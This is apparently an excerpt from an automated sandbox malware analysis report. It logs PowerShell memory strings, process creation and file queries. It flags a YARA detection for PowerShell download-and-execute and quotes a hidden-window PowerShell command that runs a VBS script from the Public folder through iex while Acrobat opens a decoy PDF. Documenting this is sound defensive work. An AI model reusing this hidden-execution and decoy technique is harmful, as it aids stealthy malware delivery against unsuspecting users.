      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000009.00000002.2617112986.000001D9E9E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000000.00000002.1671504647.000001EEE10E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: svchost.exe, 00000009.00000002.2614012303.000001D9E482B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
      Source: powershell.exe, 00000003.00000002.1417398167.000001B086E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.1678011340.000001EEE139F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_528.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 528, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
